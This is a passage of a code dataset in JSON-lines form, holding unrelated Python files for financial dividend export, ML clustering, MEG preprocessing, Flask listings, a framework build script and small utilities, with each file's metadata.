self.option(\"port\")\n\n def get_listen(self):\n return self.option(\"listen\")\n","sub_path":"bountydns/cli/dns/dns_server.py","file_name":"dns_server.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"199632399","text":"''' =====================================================================\n Dividend Extract\n\n This module exposes functions to extract dividend data from given\n streams as well as build up the index dividend data (converted to\n index points) of a given index.\n \n Note that this module is used in the dividend upload to ME.\n\n Eben Mare\n \n \n CR492813 - Eben Mare, Convert realised dividends to be outputed in cents (multiply by 100)\n ABITFA-3046: TCU, Type column for dividend estimates wanted for ME contribution\n PRMW787 - CHNG0003297785 : Use FPriceLinkDefinition instead of FPriceDefinition for getting RIC code for instruments\n\t\n ===================================================================== '''\n\nimport ael, acm\nimport re\nfrom DateUtils import PDate\n\nINDEX_HEADER = (\"Stock\", \"Ex-Date\", \"Amount\", \"Pay-Date\", \"Type\", \"Comment\", \"FADivType\")\nSS_HEADER = (\"Stock\", \"Ex-Date\", \"Amount\", \"Pay-Date\", \"Type\", \"Comment\", \"FADivType\")\nDATE_FORMAT = \"%Y-%m-%d\"\nSPOTMARKET = 10\nRICMappings = {}\n\ndef MapDivType(div):\n #Maps the dividend type to the BarCap Standard.\n descript = div.description.lower()\n if re.compile(\"f.*\").match(descript):\n return \"Final\"\n elif re.compile(\"i.*\").match(descript):\n return \"Interim\"\n else: return \"Interim\"\n\ndef MapFrontTickerToRIC(stock):\n if stock in RICMappings:\n return RICMappings[stock]\n else:\n price_link = acm.FPriceLinkDefinition.Select(\"instrument = %d and market = %d\" % (ael.Instrument[stock].insaddr, SPOTMARKET) ) #Filter on the SPOT market\n \n if price_link:\n ReutersRIC = price_link[0].IdpCode() \n if len(price_link) > 1:\n if price_link[1].PriceDistributor().Name() == \"REUTERS_FEED_1\":\n ReutersRIC = price_link[1].IdpCode()\n \n RICMappings[stock] = ReutersRIC\n return ReutersRIC and ReutersRIC\n\ndef IsValidForME(div):\n #Special divs aren't sent through to ME; Simulated, Final and Interim divs are.\n return re.compile(\"simulated|(f.*)|(i.*)\").match(div.description.lower()) and True or 
False\n\ndef GetInstrActualDivs(insName):\n return list(ael.Dividend.select(\"insaddr = %d\" % ael.Instrument[insName].insaddr))\n\ndef GetInstrDivEstimates(insName):\n stream = ael.DividendStream.select(\"insaddr = %d\" % ael.Instrument[insName].insaddr)\n return stream and stream[0].estimates()\n\ndef GetInstrWeightInIndex(insName, indexName):\n insaddr = ael.Instrument[insName].insaddr\n for lnk in ael.Instrument[indexName].combination_links():\n if lnk.member_insaddr.insaddr == insaddr: return lnk.weight\n\ndef GetIndexConstituents(indexName):\n return [lnk.member_insaddr.insid for lnk in ael.Instrument[indexName].combination_links().members()]\n\ndef GetWeightedIndexDivsDetail(indexName):\n divs = []\n index_factor = ael.Instrument[indexName].index_factor\n for insid in GetIndexConstituents(indexName):\n intrWeight = GetInstrWeightInIndex(insid, indexName)\n estimates = GetInstrDivEstimates(insid)\n for est in estimates:\n if est.ex_div_day > ael.date_today() and IsValidForME(est):\n divs.append( (MapFrontTickerToRIC(indexName), est.ex_div_day, est.dividend * intrWeight / index_factor, est.pay_day, MapDivType(est), MapFrontTickerToRIC(insid)) )\n\n return divs\n\ndef GetInstrActualDivsDetail(insName):\n return [ (MapFrontTickerToRIC(insName), PDate(d.ex_div_day).strftime(), d.dividend*100, PDate(d.pay_day).strftime(), MapDivType(d), \"\", \"\") \\\n for d in GetInstrActualDivs(insName) if IsValidForME(d)]\n\ndef GetInstrDivsEstDetail(insName):\n return [ (MapFrontTickerToRIC(insName), PDate(e.ex_div_day).strftime(), e.dividend*100, PDate(e.pay_day).strftime(), MapDivType(e), \"\", GetDividentType(e) ) \\\n for e in GetInstrDivEstimates(insName) if IsValidForME(e)]\n\ndef GetDividentType(div_est):\n val = div_est.dividend_type\n out_val=\"\" \n \n if val == \"Declared\":\n out_val =\"Declared\"\n\n return out_val\n\ndef _formatDivs(divs):\n return \"\\n\".join([\",\".join(map(str, div)) for div in divs])\n \ndef SaveDivsToFile(instrList, filename, divType):\n divs = []\n for insid in instrList:\n if divType == \"ssdivs\":\n #Add historical divs as well as estimates\n divs.extend(GetInstrActualDivsDetail(insid))\n divs.extend(GetInstrDivsEstDetail(insid))\n elif divType == \"indexdivs\":\n divs.extend(GetWeightedIndexDivsDetail(insid))\n \n #We will sort the list by stock name and then by ex-div day\n #note python has stable sort so we sort in reverse.\n divs.sort(lambda x, y: cmp(PDate(x[1], DATE_FORMAT), PDate(y[1], DATE_FORMAT))) #Sort by Ex-div Day\n divs.sort(lambda x, y: cmp(x[0], y[0])) #Sort by Stock Name\n\n #Get Header to use\n if divType == \"ssdivs\":\n header = SS_HEADER\n elif divType == \"indexdivs\":\n header = INDEX_HEADER\n\n file = open(filename, \"w\")\n try:\n file.write(\",\".join(header) + \"\\n\" + _formatDivs(divs))\n finally:\n file.close()\n\ndef SaveSSDivsToFile(instrList, filename):\n SaveDivsToFile(instrList, filename, \"ssdivs\")\n\ndef SaveIndexDivsToFile(instrList, filename):\n SaveDivsToFile(instrList, filename, \"indexdivs\")\n\ndef test():\n SaveSSDivsToFile([\"ZAR/ABL\", \"ZAR/ACL\", \"ZAR/GFI\", \"ZAR/MRP\"], r\"C:\\temp\\ssdivs.txt\")\n SaveIndexDivsToFile([\"ZAR/ALSI\", \"ZAR/SWIX\"], r\"C:\\temp\\indexdivs.txt\")\n","sub_path":"Python modules/SAEQ_DIV_EXTRACT.py","file_name":"SAEQ_DIV_EXTRACT.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"500878290","text":"import sys\nsys.path.append('..')\nfrom game_env.envv2 import *\n# from envv2 import 
*\nfrom configs import ALL_PLAYER_ACTIONS\n\nif __name__ == '__main__':\n # set_global_seeds(DQNSetting.SEED)\n Game = GatherMultEnv()\n # Game.visual = True\n Game.reset()\n\n print(Game.observation_space)\n while True:\n actions = {'agent-0':random.choice(ALL_PLAYER_ACTIONS), 'agent-1':random.choice(ALL_PLAYER_ACTIONS)}\n observations, rewards, dones, info =Game.step(actions)\n # print(rewards)\n \n\n","sub_path":"test/test_gathering.py","file_name":"test_gathering.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"520774395","text":"import plistlib\nimport subprocess\nimport time\n\nfactoid = \"xprotect_date\"\n\n\ndef fact():\n \"\"\"Returns the last date xprotect was updated\"\"\"\n\n result = \"None\"\n\n try:\n cmd = [\"/usr/sbin/pkgutil\", \"--pkgs=.*XProtect.*\"]\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n (pkgs, stderr) = proc.communicate()\n\n if pkgs:\n dates = []\n for pkgid in pkgs.splitlines():\n pkginfo_plist = subprocess.check_output(\n [\"/usr/sbin/pkgutil\", \"--pkg-info-plist\", pkgid]\n )\n pkginfo = plistlib.loads(pkginfo_plist)\n dates.append(pkginfo[\"install-time\"])\n\n result = time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.localtime(max(dates)))\n except (OSError, IOError):\n pass\n\n return {factoid: result}\n\n\nif __name__ == \"__main__\":\n print(\"%s\" % fact()[factoid])\n","sub_path":"artifacts/xprotect_date.py","file_name":"xprotect_date.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"580127285","text":"import os, shutil, sys, re, subprocess\nimport caf_module\nfrom jsmin import jsmin\n\ndef copy_folder(src, dst, all_folder = False):\n\tif not os.path.exists(dst):\n\t\tos.mkdir(dst)\n\tfor root, dirs, files in os.walk(src):\n\t\tfor file in files:\n\t\t\tif not file.endswith('.tar') and not file.endswith('.zip') and not file == '.DS_Store' and not file == 'index.html' and not file == 'app.json':\n\t\t\t\tshutil.copyfile(root + '/' + file, dst + '/' + file)\n\n\t\tfor dir in dirs:\n\t\t\tif dir.startswith('.'):\n\t\t\t\tdirs.remove(dir)\n\t\tif all_folder:\n\t\t\tfor dir in dirs:\n\t\t\t\tcopy_folder(src + '/' + dir, dst + '/' + dir, all_folder)\n\t\telse:\n\t\t\tbreak\n\n\ndef build_framework(root_path, build_path, framework_path, option='--release'):\n\tos.chdir(build_path)\n\tos.chdir('../')\n\tif option == '--debug':\n\t\trelease = False\n\t\tdebug = True\n\telif option == '--release':\n\t\trelease = True\n\t\tdebug = False\n\telif option == '--all':\n\t\trelease = True\n\t\tdebug = True\n\tif release:\n\t\tos.mkdir('caf')\n\t\tos.chdir('caf')\n\t\tos.mkdir('res')\n\t\tos.mkdir('res/css')\n\t\tos.mkdir('lib')\n\t\tcopy_folder(framework_path + '/res/css', 'res/css')\n\t\tos.chdir('lib')\n\t\taui_lib = open('aui.lib.js', 'w')\n\t\taui_lib.write(jsmin(caf_module.lib_out(framework_path + '/src', 'aui.lib.js')))\n\t\taui_lib.close()\n\t\tcaf_lib = open('caf.lib.js', 'w')\n\t\tcaf_lib.write(jsmin(caf_module.lib_out(framework_path + '/src', 'caf.lib.js')))\n\t\tcaf_lib.close()\n\t\taui_tpl = open('aui.tpl.js', 'w')\n\t\taui_tpl.write(jsmin(caf_module.tpl_out(framework_path + '/src', 'aui.tpl.js')))\n\t\taui_tpl.close()\n\t\tos.chdir(build_path)\n\t\tos.chdir('../')\n\t\tif sys.version.startswith('2.7'):\n\t\t\tshutil.make_archive('caf.min', 'zip', './', 'caf')\n\t\t\tshutil.rmtree('caf')\n\t\telse:\n\t\t\tsubprocess.call(['tar', 
'cvzf', 'caf.min' + '.zip', 'caf'])\n\t\t\tsubprocess.call(['rm', '-rf', 'caf'])\n\tif debug:\n\t\tos.mkdir('caf')\n\t\tos.chdir('caf')\n\t\tos.mkdir('res')\n\t\tos.mkdir('res/css')\n\t\tos.mkdir('lib')\n\t\tcopy_folder(framework_path + '/res/css', 'res/css')\n\t\tos.chdir('lib')\n\t\taui_lib = open('aui.lib.js', 'w')\n\t\taui_lib.write(caf_module.lib_out(framework_path + '/src', 'aui.lib.js'))\n\t\taui_lib.close()\n\t\tcaf_lib = open('caf.lib.js', 'w')\n\t\tcaf_lib.write(caf_module.lib_out(framework_path + '/src', 'caf.lib.js'))\n\t\tcaf_lib.close()\n\t\taui_tpl = open('aui.tpl.js', 'w')\n\t\taui_tpl.write(caf_module.tpl_out(framework_path + '/src', 'aui.tpl.js'))\n\t\taui_tpl.close()\n\t\tos.chdir(build_path)\n\t\tos.chdir('../')\n\t\tif sys.version.startswith('2.7'):\n\t\t\tshutil.make_archive('caf', 'zip', './', 'caf')\n\t\t\tshutil.rmtree('caf')\n\t\telse:\n\t\t\tsubprocess.call(['tar', 'cvzf', 'caf' + '.zip', 'caf'])\n\t\t\tsubprocess.call(['rm', '-rf', 'caf'])\n\tos.chdir(build_path)\n\treturn {'status':'ok', 'msg':'build success'}\n\ndef build_app(app_name, root_path, build_path, framework_path, option='--release'):\n\tos.chdir(root_path)\n\tos.chdir('apps')\n\tif not os.path.exists(app_name):\n\t\treturn {'status':'err', 'msg':'app doen\\'t exists'}\n\tos.chdir(app_name)\n\tapp_path = os.getcwd()\n\tdest_path = app_path + '/' + app_name\n\tcopy_folder('./', app_name)\n\ttry:\n\t\topen('app.json').close()\n\t\thtml_string = caf_module.html_out(root_path + '/', app_name)\n\texcept:\n\t\tindex_html = open('index.html')\n\t\thtml_string = index_html.read()\n\t\tindex_html.close()\n\tif option != '--debug':\n\t\thtml_string = html_string.replace('true', 'false')\n\t\thtml_string = html_string.replace('core_shield: false', 'core_shield: true')\n\t\thtml_string = html_string.replace('core_shield:false', 'core_shield: true')\n\t\thtml_string = html_string.replace('\"active\": false', '\"active\": true')\n\t\thtml_string = html_string.replace('\"active\":false', '\"active\": true')\n\thtml_string = html_string.replace('/framework/', '')\n\tif os.path.exists('lib'):\n\t\tcopy_folder('lib', app_name + '/' + 'lib', True)\n\telse:\n\t\tos.mkdir(app_name + '/lib')\n\tos.chdir(app_name)\n\t_index_html = open('index.html', 'w')\n\t_index_html.write(html_string)\n\t_index_html.close()\n\tif not os.path.exists('res'):\n\t\tos.mkdir('res')\n\tcopy_folder('../res/css', 'res/css', True)\n\tcopy_folder('../res/images', 'res/images', True)\n\tcopy_folder(framework_path + '/res/css', 'res/css')\n\tlibs = [\n\t\t['lib/' + app_name + '.lib.js', '../src', app_name + '.lib.js'],\n\t\t['lib/' + 'aui.lib.js', framework_path + '/src', 'aui.lib.js'],\n\t\t['lib/' + 'caf.lib.js', framework_path + '/src', 'caf.lib.js']\n\t]\n\tfor lib in libs:\n\t\t_lib = open(lib[0], 'w')\n\t\t_lib.write(jsmin(caf_module.lib_out(lib[1], lib[2])))\n\t\t_lib.close()\n\ttpls = [\n\t\t['lib/' + app_name + '.tpl.js', '../src', app_name + '.tpl.js'],\n\t\t['lib/aui.tpl.js', framework_path + '/src', 'aui.tpl.js']\n\t]\n\tfor tpl in tpls:\n\t\t_tpl = open(tpl[0], 'w')\n\t\t_tpl.write(jsmin(caf_module.tpl_out(tpl[1], tpl[2])))\n\t\t_tpl.close()\n\tos.chdir('../')\n\tif sys.version.startswith('2.7'):\n\t\tshutil.make_archive(app_name, 'zip', './', app_name)\n\t\tshutil.rmtree(app_name)\n\telse:\n\t\tsubprocess.call(['tar', 'cvzf', app_name + '.zip', app_name])\n\t\tsubprocess.call(['rm', '-rf', app_name])\n\tshutil.move(app_name + '.zip', build_path + '/../' + app_name + '.zip')\n\tos.chdir(build_path)\n\treturn {'status':'ok', 
'msg':'build success'}\n\ndef main(app_name, option='--release'):\n\tbuild_path = os.getcwd()\n\troot_path = os.getcwd() + '/../../'\n\troot_path = os.path.abspath(root_path)\n\tframework_path = root_path + '/' + 'framework'\n\tif app_name.lower() == 'caf':\n\t\treturn build_framework(root_path, build_path, framework_path, option)\n\telse:\n\t\treturn build_app(app_name, root_path, build_path, framework_path, option)\n\nif __name__ == '__main__':\n\t# pass CLI arguments through; main() requires app_name\n\tmain(*sys.argv[1:])","sub_path":"caf/build/libs/caf_build.py","file_name":"caf_build.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"576197646","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"runMonitorRecoPU\")\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet(\n    input = cms.untracked.int32(-1)\n)\nprocess.source = cms.Source(\"PoolSource\",\n    fileNames = cms.untracked.vstring('file:reco.root')\n)\n\nprocess.load(\"fabiocos.CMSSWUtil.MonitorRecoPU_cfi\")\n\nprocess.MessageLogger.categories=cms.untracked.vstring('FwkJob'\n ,'FwkReport'\n ,'FwkSummary'\n ,'Root_NoDictionary'\n ,'RecoPUInfo'\n)\n \n\nprocess.MessageLogger.cerr.INFO = cms.untracked.PSet(limit = cms.untracked.int32(-1))\nprocess.MessageLogger.cerr.RecoPUInfo = cms.untracked.PSet(limit = cms.untracked.int32(-1))\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(10000)\n\nprocess.TFileService = cms.Service(\"TFileService\", fileName = cms.string(\"monitorRecoPU_histo.root\") )\n\nprocess.p = cms.Path(process.monitorRecoPU)\n\n\n","sub_path":"test/runMonitorRecoPU_cfg.py","file_name":"runMonitorRecoPU_cfg.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"374227085","text":"import sys\ndef accumulate():\n    tally = 0\n    while 1:\n        next = yield\n        if next is None:\n            return tally\n        tally += next\n\n\ndef gather_tallies(tallies):\n    while 1:\n        tally = yield from accumulate()\n        tallies.append(tally)\n\n\n\ntallies = []\nacc = gather_tallies(tallies)\nnext(acc) # Ensure the accumulator is ready to accept values\nfor i in range(4):\n    acc.send(i)\nacc.send(None) # Finish the first tally\nfor i in range(5):\n    acc.send(i)\n\nacc.send(None) # Finish the second tally\nprint(tallies)\n\n\n\ndef yieldtest():\n    i = 0\n    while 1:\n        m = yield\n        i += 1\n        print(i)\n        if i > m: return i\n\n\ndef yieldmain(m):\n    while 1:\n        x = yield from yieldtest()\n        print(x)\n\na = yieldmain(5)\nnext(a)\nfor i in range(5):\n    a.send(i)","sub_path":"yeald_test.py","file_name":"yeald_test.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"309725453","text":"import json\n\nimport pandas as pd\nfrom sklearn.cluster import KMeans\n\nfrom backend.inference_core.utils import robustScaler2\nfrom backend.server.database.schemas.algorithms.cluster import KMeansCluster\n\n\ndef get_params():\n    return list(range(2, 21))\n\n\ndef get_kmeans_count():\n    n_clusters = get_params()\n    return len(n_clusters)\n\n\ndef kmeans(data, n_clusters, init_centers=None):\n    clf = KMeans(\n        n_clusters=n_clusters,\n        init=\"k-means++\" if init_centers is None else init_centers,\n        random_state=0,\n    )\n    clf.fit(data)\n    labels = clf.labels_\n    centers = clf.cluster_centers_\n    return labels, centers, n_clusters\n\n\ndef computeKMeansClusters(data: pd.DataFrame, dimensions, record_id):\n    
n_clusters = get_params()\n\n scaler = robustScaler2(data.values)\n scaled_data = scaler.transform(data.values)\n\n results = [kmeans(scaled_data, n) for n in n_clusters]\n\n infos = [\n {\n \"params\": {\"n_clusters\": n_cluster},\n \"centers\": (scaler.inverse_transform(centers)).tolist(), # type:ignore\n }\n for _, centers, n_cluster in results\n ]\n\n rets = [\n (\",\".join(map(str, labels)), json.dumps(info)) # type: ignore\n for (labels, _c, _n), info in zip(results, infos)\n ]\n\n return [\n KMeansCluster(\n dimensions=dimensions,\n output=output,\n info=params,\n record_id=record_id,\n )\n for output, params in rets\n ]\n","sub_path":"backend/inference_core/algorithms/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"35786510","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport sys\n\nimport numpy as np\n\nfrom tensorflow.python.platform import app\n\nFLAGS = None\n\n\ndef load_weights_and_biases_to_numpy_array_from_checkpoint_file(numpy_file_name):\n try:\n variable_scope_to_name_to_value_dict = np.load(numpy_file_name).item()\n print(variable_scope_to_name_to_value_dict)\n except Exception as e: # pylint: disable=broad-except\n print(str(e))\n\n\ndef main(unused_argv):\n if not FLAGS.file_name:\n print(\n \"Usage: save_tf_checkpoint_to_numpy.py --file_name=numpy_data_file_path\")\n sys.exit(1)\n else:\n load_weights_and_biases_to_numpy_array_from_checkpoint_file(FLAGS.file_name)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.register(\"type\", \"bool\", lambda v: v.lower() == \"true\")\n parser.add_argument(\n \"--file_name\", type=str, default=\"\", help=\"Checkpoint filename. 
\"\n        "Note, if using Checkpoint V2 format, file_name is the "\n        "shared prefix between all files in the checkpoint.")\n    FLAGS, unparsed = parser.parse_known_args()\n    app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","sub_path":"save_tf_checkpoint_to_numpy_test.py","file_name":"save_tf_checkpoint_to_numpy_test.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"429600269","text":"import os.path as op\nimport warnings\nimport numpy as np\n\nfrom mne import find_events, Epochs, pick_types\nfrom mne.epochs import concatenate_epochs\nfrom mne.io import Raw\n\nfrom jr.meg import least_square_reference\nfrom jr.meg.artefact import detect_bad_channels\n\nfrom files.base import paths\nfrom files.data_path import data_path as global_data_path\n\n\ndef preprocess_raw(fname, l_freq=.51, h_freq=30.):\n    import matplotlib.pyplot as plt\n    # Read\n    raw = Raw(fname, preload=True)\n\n    print('Known bad channels: ', raw.info['bads'])\n    picks = pick_types(raw.info, meg=True)\n\n    # Only axial grad, not reference magnetometers\n    picks = np.where([ch['coil_type'] == 6001 for ch in raw.info['chs']])[0]\n    error_chan, _ = detect_bad_channels(raw, picks=picks)\n    plt.plot(error_chan)\n    plt.show()\n    threshold = 5 * np.percentile(error_chan, 70)\n    for ch in np.where(error_chan > threshold)[0]:\n        ch_name = raw.ch_names[picks[ch]]\n        warnings.warn('%s appeared to be bad' % ch_name)\n        raw.info['bads'] += [ch_name]\n\n    # Apply Least Square projection from ref channels\n    raw = least_square_reference(raw)\n\n    # Interpolate bad channels\n    raw.interpolate_bads()\n\n    # Apply Least Square projection from ref channels\n    raw = least_square_reference(raw)\n\n    # Filter\n    raw.filter(l_freq, h_freq)\n    return raw\n\n\ndef epoch_raws(subject, task, event_id=None, tmin=-.200, tmax=.700,\n               l_freq=.51, h_freq=30., data_path=None, overwrite=False):\n    data_path = global_data_path if data_path is None else data_path\n    n_run = sum([run['typ'] == task for run in subject['meg_files']])\n    if n_run == 0:\n        warnings.warn('no raw with %s:%s' % (subject['name'], task))\n        return\n    epochs = None\n    for run in range(n_run):\n        fname = paths(subject, 'raw', name='%s_%.2i' % (task, run),\n                      data_path=data_path)\n        # Preprocess\n        raw = preprocess_raw(fname, l_freq=l_freq, h_freq=h_freq)\n        # Epoch\n        events = find_events(raw, min_duration=.010)\n        epochs_ = Epochs(raw, events, tmin=tmin, tmax=tmax, baseline=None,\n                         verbose=False, event_id=event_id)\n        # Append\n        epochs = epochs_ if run == 0 else concatenate_epochs([epochs, epochs_])\n    # Save epochs\n    fname = paths(subject, 'epochs', name=task, data_path=data_path)\n    if not op.exists(fname) or overwrite:\n        epochs.save(fname)\n    else:\n        warnings.warn('%s already exists, need `overwrite=True`' % fname)\n    return epochs\n","sub_path":"scripts/analysis/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346361510","text":"import re\nfrom flask import (\n    Blueprint,\n    Flask, \n    abort, \n    flash, \n    redirect, \n    render_template, \n    request, \n    session, \n    url_for, \n    )\nfrom flask_login import login_required\nfrom flask_sqlalchemy import *\nfrom app.models import (\n    db, \n    PostHome, \n    PostCar, \n    )\nfrom app.post.forms import (\n    HomeForm, \n    CarForm, \n    )\nfrom app.utils.scripts import verify_required\nfrom datetime import datetime\n\n\npost_blueprint = Blueprint('post', __name__, 
template_folder='templates')\n\n# constants\nPOSTS_PER_PAGE = 23\n\n\ndef apply_common_filters():\n    pmin, pmax = 0, 0\n    city = ''\n    if request.args.get('pmin'):\n        pmin = int(re.search(r'\\d+', request.args.get('pmin')).group())\n        pmax = int(re.search(r'\\d+', request.args.get('pmax')).group())\n        city = request.args.get('city')\n\n    return pmin, pmax, city\n\n\ndef apply_home_filters():\n    beds, baths, parking = 0, 0, 0\n    if request.args.get('beds'):\n        beds = request.args.get('beds')\n        baths = request.args.get('baths')\n        parking = request.args.get('parking')\n\n    return beds, baths, parking\n\n\ndef apply_car_filters():\n    year, make, mileage = 0, '', 0\n    if request.args.get('year'):\n        year = request.args.get('year')\n        make = request.args.get('make')\n        mileage = request.args.get('mileage')\n\n    return year, make, mileage\n\n\ndef apply_home_prices(pmin, pmax):\n    price_min = round(db.session.query(db.func.min(PostHome.price)).scalar() - 1000, -3)\n    price_max = round(db.session.query(db.func.max(PostHome.price)).scalar() + 1000, -3)\n    if pmin or pmax:\n        pmin_filtered = pmin\n        pmax_filtered = pmax\n    else: \n        pmin_filtered = price_min\n        pmax_filtered = price_max\n\n    return (price_min, price_max, \n            pmin_filtered, pmax_filtered )\n\n\ndef apply_car_prices(pmin, pmax):\n    price_min = round(db.session.query(db.func.min(PostCar.price)).scalar() - 100, -2)\n    price_max = round(db.session.query(db.func.max(PostCar.price)).scalar() + 100, -2)\n    if pmin or pmax:\n        pmin_filtered = pmin\n        pmax_filtered = pmax\n    else: \n        pmin_filtered = price_min\n        pmax_filtered = price_max\n\n    return (price_min, price_max, \n            pmin_filtered, pmax_filtered )\n\n\n@post_blueprint.route('/homes/', methods=['GET'])\n@post_blueprint.route('/homes/<int:page_num>', methods=['GET'])\ndef show_home_posts(page_num=1):\n    try:\n        pmin, pmax, city = apply_common_filters()\n        beds, baths, parking = apply_home_filters()\n        price_min, price_max, pmin_filtered, pmax_filtered = apply_home_prices(pmin, pmax)\n        cities = db.session.query(PostHome.city.distinct().label('city')).order_by(PostHome.city).all()\n        filtered_posts = (PostHome.query\n                          .filter(PostHome.price >= pmin_filtered)\n                          .filter(PostHome.price <= pmax_filtered)\n                          .filter(PostHome.city.contains(city))\n                          .filter(PostHome.bedrooms >= beds)\n                          .filter(PostHome.bathrooms >= baths)\n                          .order_by(PostHome.id.desc()) )\n        filtered_count = filtered_posts.count()\n        paginated_posts = filtered_posts.paginate(page_num, POSTS_PER_PAGE, False).items\n        posts = paginated_posts\n    \n        return render_template('/posts.html', \n                               page='homes', \n                               price_min=price_min, \n                               price_max=price_max, \n                               pmin_filtered=pmin_filtered, \n                               pmax_filtered=pmax_filtered, \n                               cities=cities, \n                               num_results=filtered_count, \n                               posts=posts, \n                               today=datetime.now() )\n    except:\n        abort(404)\n\n\n@post_blueprint.route('/cars/', methods=['GET'])\n@post_blueprint.route('/cars/<int:page_num>', methods=['GET'])\ndef show_car_posts(page_num=1):\n    try:\n        pmin, pmax, city = apply_common_filters()\n        year, make, mileage = apply_car_filters()\n        price_min, price_max, pmin_filtered, pmax_filtered = apply_car_prices(pmin, pmax) \n        cities = db.session.query(PostCar.city.distinct().label('city')).order_by(PostCar.city).all()\n        filtered_posts = (PostCar.query\n                          .filter(PostCar.price >= pmin_filtered)\n                          .filter(PostCar.price <= pmax_filtered)\n                          .filter(PostCar.city.contains(city))\n                          .filter(PostCar.year >= year)\n                          .filter(PostCar.make >= make)\n                          .filter(PostCar.mileage >= mileage)\n                          .order_by(PostCar.id.desc()) )\n        filtered_count = filtered_posts.count()\n        paginated_posts = 
filtered_posts.paginate(page_num, POSTS_PER_PAGE, False).items\n        posts = paginated_posts\n    \n        return render_template('/posts.html', \n                               page='cars', \n                               price_min=price_min, \n                               price_max=price_max, \n                               pmin_filtered=pmin_filtered, \n                               pmax_filtered=pmax_filtered, \n                               num_results=filtered_count, \n                               cities=cities, \n                               posts=posts, \n                               today=datetime.now() )\n    except:\n        abort(404)\n\n\n@post_blueprint.route('/<page>/edit', methods=['GET', 'POST'])\n@login_required\n@verify_required\ndef edit_home_post(page):\n    form = HomeForm()\n\n    if request.method == 'GET':\n        return render_template('home_edit.html', page=page, form=form)\n    if request.method == 'POST':\n        if form.validate_on_submit():\n        \n            return render_template('home_edit.html', page=page, form=form)\n        else:\n            return render_template('home_edit.html', page=page, form=form)\n","sub_path":"app/post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"458484628","text":"from optparse import OptionParser\n\nif __name__ == \"__main__\":\n    import sys\n    op = OptionParser(usage='Usage: %prog [options]')\n    op.add_option(\"--input\",\n                  dest=\"fname\",\n                  help=\"Input file to retag\")\n    op.add_option(\"--output\",\n                  dest=\"oname\",\n                  help=\"Output file where to place the result\")\n    op.add_option(\"--target_column\",\n                  dest=\"targetcol\",\n                  help=\"Target column to concat\")\n\n    (opts, args) = op.parse_args()\n\n    if not opts.fname or not opts.oname:\n        print(\"Needed --input --output parameters\")\n        sys.exit()\n    with open(opts.fname) as f:\n        content = f.readlines()\n    targetcol = int(opts.targetcol)\n    with open(opts.oname, \"w+\") as f:\n        for line in content:\n            items = line.split(\"\\t\")\n            if len(items) < 2:\n                f.write('\\n\\n')\n                continue\n            new_line = items[targetcol] + \" \"\n            f.write(new_line)\n","sub_path":"util/conll_to_txt.py","file_name":"conll_to_txt.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"599600754","text":"import csv\n\nticker_list = list()\nprint(\"The tickers will be delimited by spaces...\")\ntickers = input(\"Enter a list of tickers: \")\ntickers = tickers.split(' ')\n\nfor ticker in tickers:\n    ticker_list.append(ticker)\n\ncsv_file = input(\"Enter a file to parse data to: \")\n\nwith open(csv_file, 'w') as f:\n    w = csv.writer(f, dialect = 'excel', quoting = csv.QUOTE_ALL) \n    for word in ticker_list:\n        w.writerow([word])\n    \nwith open(csv_file, 'r') as my_file:\n    reader = csv.reader(my_file, delimiter =' ')\n    my_list = list(reader)\n    filtered_list = [x for x in my_list if x]\n\ncount = 0\nfull_list = []\nfor items in filtered_list:\n    full_list.append(str(items[count]))\n","sub_path":"stock_gui/csv_generator.py","file_name":"csv_generator.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"596509643","text":"import discord\nfrom redbot.core import commands\nfrom redbot.core.bot import Red\nfrom redbot.core.utils.chat_formatting import humanize_list\n\n\nasync def is_allowed_by_hierarchy(bot: Red, mod: discord.Member, member: discord.Member):\n    return mod.top_role.position >= member.top_role.position or await bot.is_owner(mod)\n\n\ndef is_allowed_by_role_hierarchy(\n    bot: Red,\n    bot_me: discord.Member,\n    mod: discord.Member,\n    role: discord.Role,\n):\n    if role.position >= bot_me.top_role.position:\n        return (False, f"I am not higher 
